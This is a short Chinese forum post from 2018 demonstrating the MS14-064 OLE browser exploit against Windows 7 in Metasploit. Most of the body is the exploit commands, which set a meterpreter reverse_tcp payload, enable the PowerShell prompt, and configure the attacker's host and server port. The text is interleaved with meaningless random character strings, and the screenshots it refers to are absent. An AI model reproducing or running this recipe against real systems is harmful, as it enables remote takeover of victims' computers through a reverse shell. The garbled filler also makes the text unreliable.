找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1243|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

; L3 B/ v. ^; h' u! K& C 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 0 d! Q% @$ d0 i' m6 V$ R& Z. k& V

! i% E4 r) i4 L0 Q8 ^, e s

" |8 _. k X$ x5 K 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: ) S w( e( J% I6 L5 c) P3 ]5 S, G+ {

* C3 A$ |; M! E% F C

# Q5 L8 D% }# u 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp: Z. n0 ^% u, |9 R& L! i

+ W9 ^1 M$ S4 b% E5 g

( M, F R& i9 C+ \1 q" ^& F) }             set AllowPowershellPrompt true, Y6 H+ m3 h, n- }- q( C. ?6 i

: ]! }0 P' Q. \+ f7 W

Q. Z6 c; s, P( T             Set LHOST 192.168.0.109 $ ~( I5 W: i5 F0 Q1 q! I4 f

. y a: D3 r, M8 F

|! o6 B$ U' V9 M             set SRVHOST 192.168.0.109 ) s" X I& E& x) ^' s" e$ U/ |+ o

- R2 }( x; L- J* E- V9 g

1 v# |4 D2 x' p8 {, E, |5 m             Set uripath share' k* ?, U; }; F/ h

4 F( T+ Q" F9 [5 r( o6 B6 o

. `) S9 P% M& C( O             Set srvport 805 L7 E% U- W. q8 f% z0 I6 ]+ {# P

7 `8 O# x( c' ~/ }/ s4 @

( D: E; n0 g: ^& O. X. a   4 F+ t( V% f- i$ B6 ~& e

8 p4 S) b) G- L+ X

7 Y3 ~: X: U. @/ n  ) S+ A4 ]& ]. \( F5 b4 Z7 V

8 ?; a U7 k8 O6 W+ H5 n

Z0 _& \0 X, ]: X" C- k) N   9 ~/ B2 t3 A7 @: ^

+ b! X N* O- |# ?% u

( d. x9 d* H0 T) |% d z   + E3 C6 s( d0 e7 L" s- B) Y; }

) l5 D' J& c" F

0 H2 {( d* I" C% r' m0 F; i: b   0 [# `$ C3 X; F9 a5 j) V$ m

+ P9 \6 J P- H- y- d, |7 _) K

8 A, r' H a2 H N2 s2 [- L 下面我们来访问本地地址如图: ( Z" q2 d q* g

$ t$ d$ X( p0 ^: L' s7 g+ C

8 E* M! ^. X% `% s   0 ]) ?/ D2 Z, ~, K: R

1 b' v" j- D5 j4 V

, A' K# C( y1 p   / p( L' J0 Z& z, _* T4 n

/ S; [/ b# r) M6 x, _9 D( p

' M4 f& H2 v, s" w( B . ^& z' S) z& c

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表